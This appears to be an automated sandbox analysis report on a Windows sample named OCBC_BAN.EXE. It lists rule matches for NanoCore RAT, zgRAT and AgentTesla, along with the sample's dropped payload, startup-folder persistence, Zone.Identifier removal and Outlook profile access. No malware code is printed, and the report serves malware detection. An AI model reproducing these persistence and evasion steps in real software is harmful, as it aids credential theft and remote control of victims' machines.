Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.3.OCBC_BAN.EXE.985c050.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.3.OCBC_BAN.EXE.985c050.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F41058
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F44BE9
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F410D0
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F4B410
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F40D40
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F40D30
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_00E3A318
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0303F3C8
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0303F080
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0693B788
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06935730
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_069384E0
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06930040
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0693847C
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06931200
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06931150
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06959BA8
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06957B60
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_069561C8
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_06954168
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 12_2_0299E480
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 12_2_0299E471
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 12_2_0299BBD4

Source: OCBC_BAN.EXE	Binary or memory string: OriginalFilename vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 00000000.00000000.366564071.0000000000822000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWaxhxbwa.exe6 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLoEHkIIHEsPPZAAaPoftCEdkhMNJM.exe4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLoEHkIIHEsPPZAAaPoftCEdkhMNJM.exe4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLoEHkIIHEsPPZAAaPoftCEdkhMNJM.exe4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 00000000.00000003.521290536.0000000009309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCsupumbveaihwmgvdfi.dll" vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE	Binary or memory string: OriginalFilename vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000000.529126357.0000000000632000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWaxhxbwa.exe6 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.637423613.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.634309710.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs OCBC_BAN.EXE
Source: OCBC_BAN.EXE	Binary or memory string: OriginalFilenameWaxhxbwa.exe6 vs OCBC_BAN.EXE

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe 01E3C7651589A572C90A38AA1476BF4A50CCD35383FE3114BE11068D5C2A9E39

Source: OCBC_BAN.EXE

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

File read: C:\Users\user\Desktop\OCBC_BAN.EXE

Jump to behavior

Source: OCBC_BAN.EXE

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\OCBC_BAN.EXE "C:\Users\user\Desktop\OCBC_BAN.EXE"
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 10
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Users\user\Desktop\OCBC_BAN.EXE C:\Users\user\Desktop\OCBC_BAN.EXE
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Users\user\Desktop\OCBC_BAN.EXE C:\Users\user\Desktop\OCBC_BAN.EXE
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 10

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe

Jump to behavior

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

File created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/5@3/3

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Mutant created: \Sessions\1\BaseNamedObjects\Global\{49b4bf8f-6f20-4306-8d82-ae70effc40f1}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_01

Source: Pubrtkzyqpdcef1.exe.0.dr, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: Pubrtkzyqpdcef1.exe.0.dr, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: OCBC_BAN.EXE

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: OCBC_BAN.EXE

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation

.NET source code contains potential unpacker

Source: OCBC_BAN.EXE, dyrax.cs	.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: windscribe.exe.0.dr, dyrax.cs	.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.OCBC_BAN.EXE.820000.0.unpack, dyrax.cs	.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.OCBC_BAN.EXE.820000.0.unpack, dyrax.cs	.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Code function: 0_2_00F4CFC7 push 8B02AC5Ch; retf
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0693DD62 push 83623700h; ret
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0693E36C push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Code function: 9_2_0695EEA1 push es; retf

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe			Jump to dropped file
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe	Jump to behavior
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe	Jump to behavior
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe\:Zone.Identifier:$DATA	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

File opened: C:\Users\user\Desktop\OCBC_BAN.EXE:Zone.Identifier read attributes | delete

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
